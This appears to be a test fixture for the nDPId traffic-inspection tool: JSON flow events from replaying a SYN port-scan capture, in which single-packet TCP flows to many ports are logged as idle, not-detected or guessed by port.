-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 